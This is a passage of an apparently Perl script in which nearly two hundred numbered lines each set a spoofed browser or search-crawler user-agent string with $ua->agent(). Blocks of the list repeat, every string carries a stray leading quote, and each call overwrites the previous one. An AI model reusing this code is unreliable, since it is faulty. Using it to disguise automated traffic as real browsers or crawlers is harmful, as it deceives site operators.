  3492. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  3493. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
  3494. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  3495. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})");
  3496. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))");
  3497. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)");
  3498. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51");
  3499. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  3500. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)");
  3501. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)");
  3502. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8");
  3503. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)");
  3504. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3505. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3506. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3507. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3508. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3509. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3510. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3511. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3512. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  3513. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3514. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  3515. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3516. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3517. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3518. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3519. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  3520. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  3521. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3522. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3523. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  3524. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  3525. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3526. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3527. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3528. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  3529. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  3530. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  3531. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  3532. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  3533. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3534. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  3535. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3536. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  3537. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  3538. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  3539. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  3540. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  3541. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  3542. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  3543. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  3544. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  3545. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  3546. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  3547. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  3548. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  3549. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3550. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  3551. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3552. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  3553. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  3554. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  3555. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  3556. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  3557. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  3558. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3559. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  3560. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  3561. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  3562. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  3563. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  3564. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)");
  3565. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  3566. $ua->agent("'Googlebot/2.1 (http://www.googlebot.com/bot.html)");
  3567. $ua->agent("'Opera/9.20 (Windows NT 6.0; U; en)");
  3568. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)");
  3569. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)");
  3570. $ua->agent("'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0");
  3571. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16");
  3572. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)");
  3573. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13");
  3574. $ua->agent("'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)");
  3575. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  3576. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)");
  3577. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)");
  3578. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)");
  3579. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8");
  3580. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7");
  3581. $ua->agent("'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
  3582. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  3583. $ua->agent("'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)");
  3584. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3585. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3586. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3587. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3588. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3589. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3590. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3591. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3592. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  3593. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3594. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  3595. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3596. $ua->agent("'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)");
  3597. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)");
  3598. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  3599. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  3600. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  3601. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  3602. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  3603. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3604. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3605. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3606. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  3607. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  3608. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3609. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3610. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  3611. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  3612. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3613. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3614. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3615. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  3616. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  3617. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  3618. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  3619. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  3620. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3621. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  3622. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3623. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  3624. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  3625. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  3626. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  3627. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  3628. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  3629. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  3630. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  3631. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  3632. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  3633. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  3634. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  3635. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  3636. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3637. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  3638. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3639. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  3640. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  3641. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  3642. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  3643. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  3644. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  3645. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3646. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  3647. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  3648. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  3649. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  3650. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  3651. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3652. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3653. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3654. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  3655. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  3656. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3657. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3658. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  3659. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  3660. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3661. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3662. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3663. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  3664. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  3665. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  3666. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  3667. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  3668. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3669. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  3670. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3671. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  3672. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  3673. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  3674. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  3675. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  3676. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  3677. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  3678. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  3679. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  3680. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  3681. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  3682. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  3683. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  3684. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3685. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
